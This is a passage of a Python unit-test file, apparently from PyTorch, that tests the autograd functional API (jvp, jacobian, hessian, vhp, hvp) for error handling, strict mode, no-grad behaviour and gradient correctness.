gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
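        # Sanity-check helper: whatever _construct_standard_basis_for returns for
        # these inputs, each chunk should match its input's dtype and device, and
        # concatenating the chunks along dim=1 (cast to cpu/float) should
        # reproduce the identity matrix of size sum(numels).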
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental prototype
# warning; it is not nice for a public-facing API to raise a warning
# no matter how it is called.
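        # (The vectorize=True code path presumably relies on torch.vmap internally,
        # which is why that warning could otherwise leak out to callers.)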
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.randn([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
            # A linear function whose Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
            # A linear function whose Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
